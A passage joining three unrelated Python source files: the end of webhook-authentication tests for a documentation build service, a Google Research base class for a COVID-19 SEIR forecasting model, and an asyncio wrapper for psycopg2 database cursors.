format='json',
)
self.assertEqual(resp.status_code, 200)
self.assertFalse(resp.data['build_triggered'])
def test_generic_api_respects_basic_auth(self, trigger_build):
client = APIClient()
user = get(User)
self.project.users.add(user)
client.force_authenticate(user=user)
resp = client.post(
'/api/v2/webhook/generic/{0}/'.format(self.project.slug),
{},
format='json',
)
self.assertEqual(resp.status_code, 200)
self.assertTrue(resp.data['build_triggered'])
def test_generic_api_falls_back_to_token_auth(self, trigger_build):
client = APIClient()
user = get(User)
client.force_authenticate(user=user)
integration = Integration.objects.create(
project=self.project,
integration_type=Integration.API_WEBHOOK
)
self.assertIsNotNone(integration.token)
resp = client.post(
'/api/v2/webhook/{0}/{1}/'.format(self.project.slug, integration.pk),
{'token': integration.token},
format='json',
)
self.assertEqual(resp.status_code, 200)
self.assertTrue(resp.data['build_triggered'])
| |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The base compartmental model definition.
This base class can be extended to fully define a customized compartmental
disease model that incorporates static and dynamic covariates by learning
adaptive encoders that modify the model's compartmental transitions.
"""
import abc
import collections
import functools
import logging
from typing import Any, Dict, List, Optional, Set, Tuple, Type, Union
import numpy as np
import pandas as pd
import tensorflow as tf
from covid_epidemiology.src import constants
from covid_epidemiology.src import feature_preprocessing as preprocessing
from covid_epidemiology.src.models import generic_seir_model_constructor
from covid_epidemiology.src.models.encoders import gam_encoder
from covid_epidemiology.src.models.encoders import variable_encoder_builder
from covid_epidemiology.src.models.encoders import variable_encoders
from covid_epidemiology.src.models.shared import model_spec as model_spec_lib
from covid_epidemiology.src.models.shared import typedefs
# pylint: disable=invalid-name
_ENCODER_TYPES = Union[gam_encoder.GamEncoder, variable_encoders.StaticEncoder,
variable_encoders.PassThroughEncoder,
variable_encoders.VaccineEncoder]
# noinspection PyMethodMayBeStatic
class BaseModelDefinition(abc.ABC):
"""Defines the structure and dynamics of the compartmental model.
Attributes:
ts_preprocessing_config: The default configuration to use for pre-processing
time-series features.
static_preprocessing_config: The default configuration to use for
pre-processing static features.
random_seed: A number to be used as a random seed for the model.
"""
# The name of the column in the static and ts dataframe that has the location.
_LOCATION_COLUMN_NAME: str = constants.GEO_ID_COLUMN
# The list of rates that the encoders will predict
# This should be implemented by the sub-class
_ENCODER_RATE_LIST: List[str] = []
def __init__(
self,
ts_preprocessing_config = None,
static_preprocessing_config = None,
random_seed = 0,
**kwargs, # pylint:disable=unused-argument
):
"""Creates the compartmental model.
Args:
ts_preprocessing_config: The default configuration to use for
pre-processing time-series features.
static_preprocessing_config: The default configuration to use for
pre-processing static features.
random_seed: A random seed to use for the model.
**kwargs: Model specific keyword arguments.
"""
# FeatureConfig.
self.ts_preprocessing_config: preprocessing.FeaturePreprocessingConfig = (
ts_preprocessing_config or preprocessing.FeaturePreprocessingConfig())
self.static_preprocessing_config: preprocessing.FeaturePreprocessingConfig = (
static_preprocessing_config or
preprocessing.FeaturePreprocessingConfig())
self.random_seed = random_seed
@abc.abstractmethod
def get_ts_features(self):
"""Gets mapping of feature aliases to feature names for time series.
The feature aliases must match the associated "feature_name" in the
input_ts_table_id BiqQuery table.
Returns:
Mapping from feature names to the "feature_name" column value in the
BigQuery table.
"""
@abc.abstractmethod
def transform_ts_features(
self,
ts_features,
static_features,
initial_train_window_size,
):
"""Transforms timeseries features (scales them, removes NaNs, etc).
Can also create new features (e.g., ratios of existing features).
Args:
ts_features: A mapping from the feature name to its value, the value of
each feature is a map from location to np.ndarray.
static_features: A mapping from the static feature name to its value, the
value of each feature is a map from location to float.
initial_train_window_size: Size of initial training window.
Returns:
A mapping from the feature name to its value, the value of each feature
is a map from location to np.ndarray.
"""
@abc.abstractmethod
def get_ts_features_to_preprocess(self):
"""Get a list of time series features to pre-process.
Returns:
A list of feature aliases.
"""
@abc.abstractmethod
def get_static_features(self):
""""Gets mapping of feature aliases to feature names for time series.
The feature aliases must match the associated "feature_name" in the
input_static_table_id BiqQuery table.
Returns:
Mapping from feature names to the "feature_name" column value in the
BigQuery table.
"""
# feature configuration in one location.
@abc.abstractmethod
def get_model_spec(self, *args, **kwargs):
"""Returns the model spec.
This defines the encoders and hyper-parameters for the model.
Args:
*args: model spec related args.
**kwargs: model spec related kwargs.
Returns:
The ModelSpec object for this model
"""
@abc.abstractmethod
def seir_dynamics(self, current_state,
seir_variables):
"""Returns the derivatives of each state for SEIR dynamics.
Args:
current_state: The values of the model's compartments.
seir_variables: The values of the model's transition variables
Returns:
The derivative of the state so that the next state is the current state
plus the output of this function.
"""
@abc.abstractmethod
def compute_losses(
self, hparams, propagated_states,
ground_truth_timeseries
):
"""Calculates the loss between the propagates states and the ground truth.
Args:
hparams: Dictionary of the models hyperparameters.
propagated_states: The model's current states.
ground_truth_timeseries: The ground truth time series
Returns:
The model's loss
"""
@abc.abstractmethod
def transform_static_features(
self, static_features
):
"""Transforms static features (scales them, removes NaNs, etc).
Can also create new features (e.g., ratios).
Args:
static_features: A mapping from the feature name to its value, the value
of each feature is a map from location to a value .
Returns:
A mapping from the feature name to its value and its fitted scaler after
being prepared for the encoders, the value of each feature is a map from
location to a float.
"""
@abc.abstractmethod
def bound_variables(
self,
seir_timeseries_variables,
):
"""Maps the encoded SEIR variables into realistic bounds for the model.
This is called at the beginning of the propagation loop.
Args:
seir_timeseries_variables: The model's SEIR variables.
Returns:
The model's SEIR variables after their have been bounded approriately.
"""
@abc.abstractmethod
def initialize_ground_truth_timeseries(
self,
static_features,
ts_features,
chosen_locations,
num_observed_timesteps,
infected_threshold,
):
"""Creates the ground truth data structure from the features.
Args:
static_features: The static features as a dictionary of dictionaries.
ts_features: The time series data as a dictionary of dictionaries.
chosen_locations: A list of the locations that will be processed.
num_observed_timesteps: The total number of observed data points.
infected_threshold: The minimum number of infections to consider the virus
to be active.
Returns:
The ground truth data as a Tuple of:
1. A tensor with populations for each of the locations.
2. A dictionary where the keys are features and the values are tensors
(n_locations x num_observed_timesteps) of the feature's values.
3. A dictionary where the keys are features and the values are tensors
(n_locations x num_observed_timesteps) that are when if the feature is
valid.
4. A list of all the ground truth feature names.
5. A dictionary where the keys are ground truth compartment names and
the values are the unmodified original ground truth values.
A mask of if the infection is active which is determined when the number
of confirmed cases at a given location is above the infected threshold.
This float32 tensor is of size (num_locations x num_observed_timesteps.
"""
def initialize_components(
self,
model_spec,
ground_truth_timeseries,
infected_threshold,
hparams,
num_locations,
location_dependent_init,
chosen_locations,
num_observed_timesteps,
forecast_window_size,
output_window_size,
static_features,
static_overrides,
ts_categorical_features,
covariates,
forecasted_covariates,
covariate_overrides,
static_scalers = None,
ts_scalers = None,
trainable = True,
):
"""Initializes states, variables, and encoders.
Args:
model_spec: The model specification used for extracting the encoder specs.
ground_truth_timeseries: A tuple of the populations of the chosen
locations, the ground truth values for each compartment, the indicator
for each ground truth value, and the names of the ground truth elements.
infected_threshold: The minimum number of infections to consider the
infection to be active in each location.
hparams: Model hyper-parameters.
num_locations: The number of locations that will be predicted for.
location_dependent_init: If true different locations will have different
bias terms.
chosen_locations: A list of all the locations to use in the model.
num_observed_timesteps: The total number of observed time steps.
forecast_window_size: The number of training time steps to use in the
encoder.
output_window_size: The number of time steps to forecast from the trained
encoder.
static_features: A dictionary of static feature values where each value is
a map of location to value for that location.
static_overrides: A dictionary of over-rides for the static features.
ts_categorical_features: Which features are categorical.
covariates: A dictionary of covariate values where each value is a map of
location to array of time values.
forecasted_covariates: A map from covariate names to numpy arrays that
have n_forecast_timesteps x n_locations.
covariate_overrides: Overrides of the covariate values.
static_scalers: fitted scalers for static featutes.
ts_scalers: fitted scalers for timeseries featutes.
trainable: If False the variables will not be trainable.
Returns:
init_state: The initial SEIR states as a Tensor.
init_variables: The initial SEIR rates as taken from the hyper-parameters.
seir_encoders: The initialized encoders.
"""
init_state = self.initialize_seir_state(
ground_truth_timeseries=ground_truth_timeseries,
infected_threshold=infected_threshold,
trainable=trainable,
)
init_variables = self.initialize_seir_variables(
hparams=hparams,
num_locations=num_locations,
location_dependent_init=location_dependent_init,
trainable=trainable,
)
seir_encoders = self.initialize_encoders(
model_spec=model_spec,
chosen_locations=chosen_locations,
num_observed_timesteps=num_observed_timesteps,
forecast_window_size=forecast_window_size,
output_window_size=output_window_size,
static_features=static_features,
static_overrides=static_overrides,
covariates=covariates,
forecasted_covariates=forecasted_covariates,
covariate_overrides=covariate_overrides,
ts_categorical_features=ts_categorical_features,
static_scalers=static_scalers,
ts_scalers=ts_scalers,
trainable=trainable,
)
return init_state, init_variables, seir_encoders
@abc.abstractmethod
def initialize_seir_state(
self, ground_truth_timeseries,
infected_threshold, trainable):
"""Returns initialized states for seir dynamics."""
@abc.abstractmethod
def sync_values(
self,
hparams,
last_state,
ground_truth_timeseries,
timestep,
is_training,
):
"""Syncs values with ground truth.
This is used to implement partial teacher forcing and is used to update the
last state prior to calling `seir_dynamics`.
Args:
hparams: Model's hyper-parameters. Usually contains sync_coef to define
the amount of teacher forcing.
last_state: The model's previous state
ground_truth_timeseries: The ground truth values to sync with.
timestep: The current timestep
is_training: A boolean scalar Tensor. True if the model is being trained.
Returns:
The updated values for the last_state.
"""
@abc.abstractmethod
def sync_undoc(self, hparams, last_state,
ground_truth_timeseries,
last_variable, timestep,
is_training):
"""Synchronize the undocumented infected counts using confirmed increment.
Args:
hparams: Model's hyper-parameters. Usually contains sync_coef to define
the amount of teacher forcing.
last_state: The model's previous state.
ground_truth_timeseries: The ground truth values to sync with.
last_variable: The model's variables from the previous step. Should
include the diagnosis rate.
timestep: The current time step.
is_training: A boolean scalar Tensor. True if the model is being trained.
Returns:
The updated values for the last_state.
"""
@abc.abstractmethod
def get_model_constructor(
self,
model_spec,
random_seed,
):
"""Returns the model constructor for the model.
Args:
model_spec: A definition of the model spec. Returned by the get_model_spec
function.
random_seed: A seed used for initialization of pseudo-random numbers.
Returns:
The model constructor instance for the model.
"""
def initialize_seir_variables(self, hparams, num_locations,
location_dependent_init,
trainable):
"""Returns initialized variables for SEIR terms."""
np.random.seed(self.random_seed)
degrees_of_freedom = num_locations if location_dependent_init else 1
init_rates = []
for rate_name in self._ENCODER_RATE_LIST:
init_rates.append(hparams[rate_name + '_init'] *
np.ones(degrees_of_freedom))
variable_list = np.asarray(init_rates)
seir_variables = tf.Variable(
variable_list, dtype=tf.float32, trainable=trainable)
return seir_variables
def initialize_encoders(
self,
model_spec,
chosen_locations,
num_observed_timesteps,
forecast_window_size,
output_window_size,
static_features,
static_overrides,
covariates,
forecasted_covariates,
covariate_overrides,
ts_categorical_features,
static_scalers = None,
ts_scalers = None,
trainable = True,
):
"""Returns a set of initialized encoders for updating SEIR variables.
Args:
model_spec: The specification of the model and it's encoders.
chosen_locations: The locations to use data from.
num_observed_timesteps: The number of total time steps to use.
forecast_window_size: The number of time points to use in creating the
forecast.
output_window_size: The number of time points to forecast into the future.
static_features: Static features that will be used for the encoder.
static_overrides: Overrides of the static features.
covariates: Time-varying covariates for the encoders.
forecasted_covariates: Forecast of time points.
covariate_overrides: Overrides for time-varying covariates
ts_categorical_features: Features that are categorical.
static_scalers: fitted scalers for static featutes.
ts_scalers: fitted scalers for timeseries featutes.
trainable: If False the encoder variables will not be trainable.
Returns:
A tuple of all the initialized encoders.
"""
encoders = list()
for rate_name in self._ENCODER_RATE_LIST:
encoders.append(
variable_encoder_builder.encoder_from_encoder_spec(
self.get_encoder_by_name(model_spec.encoder_specs, rate_name),
chosen_locations=chosen_locations,
num_known_timesteps=num_observed_timesteps,
forecast_window_size=forecast_window_size,
output_window_size=output_window_size,
static_features=static_features,
static_overrides=static_overrides,
covariates=covariates,
covariate_overrides=covariate_overrides,
ts_categorical_features=ts_categorical_features,
forecasted_covariates=forecasted_covariates,
random_seed=self.random_seed,
static_scalers=static_scalers,
ts_scalers=ts_scalers,
trainable=trainable,
))
return tuple(encoders)
def extract_all_features(
self,
static_data,
ts_data,
locations,
training_window_size,
):
"""Creates time-series and static feature dictionaries from data frames.
Args:
static_data: Static data.
ts_data: Time series data.
locations: Locations to be extracted.
training_window_size: Time-series data points to use for training.
Returns:
The static series dictionary mapping features to values where the values
are a mapping of locations to a single numeric value.
The time series dictionary mapping features to values where the values are
a mapping of locations to time series values.
"""
if static_data is None:
static_features_and_scaler = (None, None)
else:
static_features_and_scaler = self._extract_static_features(
static_data, locations)
if ts_data is None or static_data is None:
ts_features_and_scaler = (None, None)
else:
(static_features, _) = static_features_and_scaler
ts_features_and_scaler = self._extract_ts_features(
ts_data, static_features, locations, training_window_size)
return static_features_and_scaler, ts_features_and_scaler
def _extract_ts_features(
self, ts_data, static_features,
locations, training_window_size
):
"""Creates time-series feature dictionaries from data frame.
This is an internal function to allow for feature engineering using both
static and time series features.
Args:
ts_data: Time series DataFrame with columns constants.FEATURE_NAME_COLUMN,
`ModelDefinition._LOCATION_COLUMN_NAME`, constants.DATE_COLUMN, and
constants.FEATURE_VALUE_COLUMN.
static_features: Static features.
locations: Locations to be extracted.
training_window_size: Time-series data points to use for training.
Returns:
The time series dictionary mapping features to values where the values are
a mapping of locations to time series values, and the fitted scalers.
"""
all_dates = preprocessing.get_all_valid_dates(ts_data)
ts_features = preprocessing.ts_feature_df_to_nested_dict(
ts_data,
locations,
all_dates,
self.get_ts_features(),
self._LOCATION_COLUMN_NAME,
)
proc_features, feature_scalers = self.transform_ts_features(
ts_features=ts_features,
static_features=static_features,
initial_train_window_size=training_window_size)
return proc_features, feature_scalers
def _extract_static_features(
self, static_data, locations
):
"""Creates a static feature dictionary from a data frame.
This is an internal function to allow for feature engineering using both
static and time series features.
Args:
static_data: Static DataFrame with columns constants.FEATURE_NAME_COLUMN,
`ModelDefinition._LOCATION_COLUMN_NAME`, and
constants.FEATURE_VALUE_COLUMN.
locations: List of locations to extract.
Returns:
The static dictionary mapping features to values where the values are
a mapping of locations to static values, and the fitted scalers.
"""
static_features = collections.defaultdict(
functools.partial(collections.defaultdict, lambda: None))
static_feature_map = self.get_static_features()
for feature_alias, feature_name in static_feature_map.items():
feature_data = static_data[static_data[constants.FEATURE_NAME_COLUMN] ==
feature_name]
for location in locations:
static_features[feature_alias][
location] = preprocessing.static_covariate_value_or_none_for_location(
feature_data, location, self._LOCATION_COLUMN_NAME)
proc_features, feature_scalers = self.transform_static_features(
static_features)
return proc_features, feature_scalers
def get_all_locations(self, input_df):
"""Gets a set of locations in the input data frame.
Args:
input_df: DataFrame with the column `_LOCATION_COLUMN_NAME`
Returns:
The set of all locations
"""
return set(pd.unique(input_df[self._LOCATION_COLUMN_NAME]))
def get_encoder_by_name(self, encoder_specs, name):
for encoder_spec in encoder_specs:
if encoder_spec.encoder_name == name:
return encoder_spec
raise ValueError(f'No encoder spec for requested encoder with name: {name}')
def encode_variables(
self,
encoders,
seir_timeseries_variables,
global_biases,
timestep,
prediction,
scaler,
is_training,
):
"""Encodes the input variables to create an output time-series.
Args:
encoders: The encoders used to encode the time-series of the SEIR
variables.
seir_timeseries_variables: The variables to be encoded.
global_biases: The global biases for each of the encoders. Is only used
for GAM encoders.
timestep: The time point being encoded.
prediction: A dictionary of predictions from the model.
scaler: A dictionary to transform predictions the same way that the
variables have already been transformed (e.g. scaling to 0-1).
is_training: True if the model is training.
"""
for variable_index in range(len(encoders)):
variable_encoder = encoders[variable_index]
variable_list = seir_timeseries_variables[variable_index]
if isinstance(variable_encoder, gam_encoder.GamEncoder):
variable_bias = global_biases[variable_index]
variable_list.append(
variable_encoder.encode(variable_list, variable_bias, timestep,
prediction, scaler, is_training))
else:
variable_list.append(
variable_encoder.encode(variable_list, timestep, is_training))
class BaseCovidModelDefinition(BaseModelDefinition, abc.ABC):
"""Extends the base class with some common helper methods.
This class takes advantage of additional assumptions about the model to
consolidate the code for common tasks like feature pre-processing.
"""
# The number of features that will be used for quantile estimation in the
# method apply_quantile_transform.
_NUM_QUANTILE_FEATURES: int = 7
def get_static_features_to_preprocess(self):
static_features_to_not_preprocess = {constants.POPULATION}
return {
feature_alias for feature_alias in self.get_static_features().keys()
if feature_alias not in static_features_to_not_preprocess
}
def transform_static_features(
self, static_features
):
"""Transforms static features (scales them, removes NaNs, etc).
Can also create new features (e.g., ratios).
Args:
static_features: A mapping from the feature name to its value, the value
of each feature is a map from location to a value .
Returns:
A mapping from the feature name to its value after being prepared for the
encoders, the value of each feature is a map from location to a float.
"""
# The static data must have population data for the compartments
if constants.POPULATION not in static_features:
raise ValueError(f'Static features must include {constants.POPULATION}')
transformed_features = {}
feature_scalers = {}
self._standard_static_preprocessing(static_features, transformed_features,
feature_scalers)
return transformed_features, feature_scalers
def _standard_static_preprocessing(
self,
raw_features,
transformed_features,
feature_scalers,
):
"""Pre-processes static features into an output dictionary.
Args:
raw_features: A dictionary with the features to be processed.
transformed_features: The output dictionary.
feature_scalers: dict of fitted scalers used to transform each feature.
"""
to_preprocess = self.get_static_features_to_preprocess()
for feature_name in raw_features:
# Don't overwrite existing data
if feature_name in transformed_features:
continue
if feature_name in to_preprocess:
transformed_features[feature_name], feature_scalers[
feature_name] = self._preprocess_static_feature(
raw_features[feature_name])
else:
transformed_features[feature_name] = raw_features[feature_name]
feature_scalers[feature_name] = None # this feature was not scaled
def _preprocess_static_feature(
self, feature_data
):
"""Pre-process a single static feature.
Args:
feature_data: A single static feature dictionary.
Returns:
The input data after being pre-processed.
"""
preprocessed_feature, scaler = preprocessing.preprocess_static_feature(
feature_data, self.static_preprocessing_config.imputation_strategy,
self.static_preprocessing_config.standardize)
return preprocessed_feature, scaler
def get_ts_features_to_preprocess(self):
return set()
def transform_ts_features(
self,
ts_features,
static_features,
initial_train_window_size,
):
"""Transforms timeseries features (scales them, removes NaNs, etc).
Can also create new features (e.g., ratios of existing features).
Args:
ts_features: A mapping from the feature name to its value, the value of
each feature is a map from location to np.ndarray.
static_features: A mapping from the static feature name to its value, the
value of each feature is a map from location to float.
initial_train_window_size: Size of initial training window.
Returns:
A mapping from the feature name to its value, the value of each feature
is a map from location to np.ndarray.
"""
transformed_features = {}
feature_scalers = {}
self._standard_ts_preprocessing(ts_features, initial_train_window_size,
transformed_features, feature_scalers)
return transformed_features, feature_scalers
def _standard_ts_preprocessing(
self,
ts_features,
initial_train_window_size,
transformed_features,
feature_scalers,
):
"""Do the normal time series pre-processing.
This transfers over death and confirmed features and creates four new
features that are named according to the constants:
`constants.DEATH_PREPROCESSED`, `constants.CONFIRMED_PREPROCESSED`,
`constants.CONFIRMED_PREPROCESSED_MEAN_TO_SUM_RATIO`, and
`constants.DEATH_PREPROCESSED_MEAN_TO_SUM_RATIO`.
The features that are returned by `get_ts_features_to_preprocess` are
pre-processed accordingly.
Args:
ts_features: A mapping from the feature name to its value, the value of
each feature is a map from location to np.ndarray.
initial_train_window_size: Size of initial training window.
transformed_features: The output feature dictionary.
feature_scalers: dict of fitted scalers used to transform each feature.
"""
if constants.DEATH not in ts_features:
raise ValueError(f'{constants.DEATH} must be in the input features')
if constants.CONFIRMED not in ts_features:
raise ValueError(f'{constants.CONFIRMED} must be in the input features')
transformed_features.update({
constants.DEATH: ts_features[constants.DEATH],
constants.CONFIRMED: ts_features[constants.CONFIRMED],
})
# Need to pre-process our two new added fields
features_to_preprocess = (
self.get_ts_features_to_preprocess()
| {constants.DEATH_PREPROCESSED, constants.CONFIRMED_PREPROCESSED})
for feature_name, feature_location_dictionary in ts_features.items():
if feature_name == constants.DEATH:
feature_name = constants.DEATH_PREPROCESSED
elif feature_name == constants.CONFIRMED:
feature_name = constants.CONFIRMED_PREPROCESSED
# Don't overwrite existing data
if feature_name in transformed_features:
continue
if feature_name in features_to_preprocess:
logging.info('Preprocessing feature: %s', feature_name)
transformed_features[feature_name], feature_scalers[
feature_name] = self._preprocess_ts_feature(
feature_location_dictionary, initial_train_window_size)
else:
transformed_features[feature_name] = ts_features[feature_name]
feature_scalers[feature_name] = None # this feature was not scaled
transformed_features[
constants.
CONFIRMED_PREPROCESSED_MEAN_TO_SUM_RATIO] = preprocessing.construct_feature_ratios(
transformed_features[constants.CONFIRMED_PREPROCESSED])
transformed_features[
constants.
DEATH_PREPROCESSED_MEAN_TO_SUM_RATIO] = preprocessing.construct_feature_ratios(
transformed_features[constants.DEATH_PREPROCESSED])
def _preprocess_ts_feature(
self,
feature_data,
initial_train_window_size,
bfill_features = None,
imputation_strategy = None,
standardize = None,
initial_value = None,
):
"""Pre-process a single time-series feature.
Args:
feature_data: A single time-series feature dictionary.
initial_train_window_size: The training window size.
bfill_features: Backward fill imputation for time-series data.
imputation_strategy: Additional imputation after ffill and bfill
standardize: Flag to indicate whether this feature is standardized.
initial_value: If None no actions will be taken. Otherwise, the first
value for each location will be set to this value if it is null.
Returns:
The input data after being pre-processed and the fitted scaler.
"""
preprocessed_feature, scaler = preprocessing.preprocess_ts_feature(
feature_data,
ffill_features=self.ts_preprocessing_config.ffill_features,
bfill_features=self.ts_preprocessing_config.bfill_features
if bfill_features is None else bfill_features,
imputation_strategy=self.ts_preprocessing_config.imputation_strategy
if imputation_strategy is None else imputation_strategy,
standardize=self.ts_preprocessing_config.standardize
if standardize is None else standardize,
fitting_window=initial_train_window_size,
initial_value=initial_value,
)
return preprocessed_feature, scaler
@abc.abstractmethod
def get_model_spec(self,
model_type,
covariate_delay = 0,
**kwargs):
f"""Return the model spec.
Args:
model_type: The type of the model. Currently supports:
{constants.MODEL_TYPE_STATIC_SEIR}
{constants.MODEL_TYPE_TIME_VARYING_WITH_COVARIATES}
{constants.MODEL_TYPE_TREND_FOLLOWING}
covariate_delay: The amount to delay the covariates. Defaults to 0.
**kwargs: Additional kwargs.
Returns:
The corresponding model spec.
""" # pylint: disable=pointless-statement
def initialize_quantile_variables(
self,
hparams,
num_quantiles,
):
"""Creates the trainable tensors for quantile regression.
Args:
hparams: The hyperparameters including the quantile_encoding_window.
num_quantiles: The number of output quantiles (e.g. 23).
Returns:
The 3D trainable kernel for the quantile estimation. Of size:
quantile_encoding_window * number of features x number of states x
number of quantiles.
The 2D trainable biases for the quantile estimation. Of size:
number of states x number of quantiles.
"""
quantile_encoding_window = hparams['quantile_encoding_window']
initial_kernel = np.zeros(
(quantile_encoding_window * self._NUM_QUANTILE_FEATURES,
self._NUM_STATES, num_quantiles))
quantile_kernel = tf.Variable(initial_kernel, dtype=tf.float32)
initial_biases = (0.1 / num_quantiles) * np.ones(
(self._NUM_STATES, num_quantiles))
quantile_biases = tf.Variable(initial_biases, dtype=tf.float32)
return quantile_kernel, quantile_biases
def gt_scaler(
self,
ground_truth_timeseries,
num_time_steps,
):
"""Get min/max values of each covariate.
These we be used to scale the predictions so that they match the
preprocessed features created from the ground truth.
Args:
ground_truth_timeseries: The ground truth data including the GT confirmed
and death values.
num_time_steps: The number of time steps over which to compute the maximum
and minimum values.
Returns:
A dictionary with keys of confirmed and death where each value is a
dictionary of the minimum and maximum values in the time range.
"""
(_, gt_list, _, _, _) = ground_truth_timeseries
confirmed_scaler = {
'min': np.min(gt_list['confirmed'][:num_time_steps]),
'max': np.max(gt_list['confirmed'][:num_time_steps]),
}
death_scaler = {
'min': np.min(gt_list['death'][:num_time_steps]),
'max': np.max(gt_list['death'][:num_time_steps]),
}
return {'confirmed': confirmed_scaler, 'death': death_scaler}
| |
import asyncio
import warnings
import psycopg2
from .log import logger
from .utils import PY_35, PY_352
class Cursor:
def __init__(self, conn, impl, timeout, echo):
self._conn = conn
self._impl = impl
self._timeout = timeout
self._echo = echo
@property
def echo(self):
"""Return echo mode status."""
return self._echo
@property
def description(self):
"""This read-only attribute is a sequence of 7-item sequences.
Each of these sequences is a collections.namedtuple containing
information describing one result column:
0. name: the name of the column returned.
1. type_code: the PostgreSQL OID of the column.
2. display_size: the actual length of the column in bytes.
3. internal_size: the size in bytes of the column associated to
this column on the server.
4. precision: total number of significant digits in columns of
type NUMERIC. None for other types.
5. scale: count of decimal digits in the fractional part in
columns of type NUMERIC. None for other types.
6. null_ok: always None as not easy to retrieve from the libpq.
This attribute will be None for operations that do not
return rows or if the cursor has not had an operation invoked
via the execute() method yet.
"""
return self._impl.description
def close(self):
"""Close the cursor now."""
self._impl.close()
@property
def closed(self):
"""Read-only boolean attribute: specifies if the cursor is closed."""
return self._impl.closed
@property
def connection(self):
"""Read-only attribute returning a reference to the `Connection`."""
return self._conn
@property
def raw(self):
"""Underlying psycopg cursor object, readonly"""
return self._impl
@property
def name(self):
# Not supported
return self._impl.name
@property
def scrollable(self):
# Not supported
return self._impl.scrollable
@scrollable.setter
def scrollable(self, val):
# Not supported
self._impl.scrollable = val
@property
def withhold(self):
# Not supported
return self._impl.withhold
@withhold.setter
def withhold(self, val):
# Not supported
self._impl.withhold = val
@asyncio.coroutine
def execute(self, operation, parameters=None, *, timeout=None):
"""Prepare and execute a database operation (query or command).
Parameters may be provided as sequence or mapping and will be
bound to variables in the operation. Variables are specified
either with positional %s or named %({name})s placeholders.
"""
if timeout is None:
timeout = self._timeout
waiter = self._conn._create_waiter('cursor.execute')
if self._echo:
logger.info(operation)
logger.info("%r", parameters)
try:
self._impl.execute(operation, parameters)
except:
self._conn._waiter = None
raise
try:
yield from self._conn._poll(waiter, timeout)
except asyncio.TimeoutError:
self._impl.close()
raise
@asyncio.coroutine
def executemany(self, operation, seq_of_parameters):
# Not supported
raise psycopg2.ProgrammingError(
"executemany cannot be used in asynchronous mode")
@asyncio.coroutine
def callproc(self, procname, parameters=None, *, timeout=None):
"""Call a stored database procedure with the given name.
The sequence of parameters must contain one entry for each
argument that the procedure expects. The result of the call is
returned as modified copy of the input sequence. Input
parameters are left untouched, output and input/output
parameters replaced with possibly new values.
"""
if timeout is None:
timeout = self._timeout
waiter = self._conn._create_waiter('cursor.callproc')
if self._echo:
logger.info("CALL %s", procname)
logger.info("%r", parameters)
try:
self._impl.callproc(procname, parameters)
except:
self._conn._waiter = None
raise
else:
yield from self._conn._poll(waiter, timeout)
@asyncio.coroutine
def mogrify(self, operation, parameters=None):
"""Return a query string after arguments binding.
The string returned is exactly the one that would be sent to
the database running the .execute() method or similar.
"""
ret = self._impl.mogrify(operation, parameters)
assert not self._conn._isexecuting(), ("Don't support server side "
"mogrify")
return ret
@asyncio.coroutine
def setinputsizes(self, sizes):
"""This method is exposed in compliance with the DBAPI.
It currently does nothing but it is safe to call it.
"""
self._impl.setinputsizes(sizes)
@asyncio.coroutine
def fetchone(self):
"""Fetch the next row of a query result set.
Returns a single tuple, or None when no more data is
available.
"""
ret = self._impl.fetchone()
assert not self._conn._isexecuting(), ("Don't support server side "
"cursors yet")
return ret
@asyncio.coroutine
def fetchmany(self, size=None):
"""Fetch the next set of rows of a query result.
Returns a list of tuples. An empty list is returned when no
more rows are available.
The number of rows to fetch per call is specified by the
parameter. If it is not given, the cursor's .arraysize
determines the number of rows to be fetched. The method should
try to fetch as many rows as indicated by the size
parameter. If this is not possible due to the specified number
of rows not being available, fewer rows may be returned.
"""
if size is None:
size = self._impl.arraysize
ret = self._impl.fetchmany(size)
assert not self._conn._isexecuting(), ("Don't support server side "
"cursors yet")
return ret
@asyncio.coroutine
def fetchall(self):
"""Fetch all (remaining) rows of a query result.
Returns them as a list of tuples. An empty list is returned
if there is no more record to fetch.
"""
ret = self._impl.fetchall()
assert not self._conn._isexecuting(), ("Don't support server side "
"cursors yet")
return ret
@asyncio.coroutine
def scroll(self, value, mode="relative"):
"""Scroll to a new position according to mode.
If mode is relative (default), value is taken as offset
to the current position in the result set, if set to
absolute, value states an absolute target position.
"""
ret = self._impl.scroll(value, mode)
assert not self._conn._isexecuting(), ("Don't support server side "
"cursors yet")
return ret
@property
def arraysize(self):
"""How many rows will be returned by fetchmany() call.
This read/write attribute specifies the number of rows to
fetch at a time with fetchmany(). It defaults to
1 meaning to fetch a single row at a time.
"""
return self._impl.arraysize
@arraysize.setter
def arraysize(self, val):
"""How many rows will be returned by fetchmany() call.
This read/write attribute specifies the number of rows to
fetch at a time with fetchmany(). It defaults to
1 meaning to fetch a single row at a time.
"""
self._impl.arraysize = val
@property
def itersize(self):
# Not supported
return self._impl.itersize
@itersize.setter
def itersize(self, val):
# Not supported
self._impl.itersize = val
@property
def rowcount(self):
"""Returns the number of rows that has been produced of affected.
This read-only attribute specifies the number of rows that the
last :meth:`execute` produced (for Data Query Language
statements like SELECT) or affected (for Data Manipulation
Language statements like UPDATE or INSERT).
The attribute is -1 in case no .execute() has been performed
on the cursor or the row count of the last operation if it
can't be determined by the interface.
"""
return self._impl.rowcount
@property
def rownumber(self):
"""Row index.
This read-only attribute provides the current 0-based index of the
cursor in the result set or ``None`` if the index cannot be
determined."""
return self._impl.rownumber
@property
def lastrowid(self):
"""OID of the last inserted row.
This read-only attribute provides the OID of the last row
inserted by the cursor. If the table wasn't created with OID
support or the last operation is not a single record insert,
the attribute is set to None.
"""
return self._impl.lastrowid
@property
def query(self):
"""The last executed query string.
Read-only attribute containing the body of the last query sent
to the backend (including bound arguments) as bytes
string. None if no query has been executed yet.
"""
return self._impl.query
@property
def statusmessage(self):
"""the message returned by the last command."""
return self._impl.statusmessage
# @asyncio.coroutine
# def cast(self, old, s):
# ...
@property
def tzinfo_factory(self):
"""The time zone factory used to handle data types such as
`TIMESTAMP WITH TIME ZONE`.
"""
return self._impl.tzinfo_factory
@tzinfo_factory.setter
def tzinfo_factory(self, val):
"""The time zone factory used to handle data types such as
`TIMESTAMP WITH TIME ZONE`.
"""
self._impl.tzinfo_factory = val
@asyncio.coroutine
def nextset(self):
# Not supported
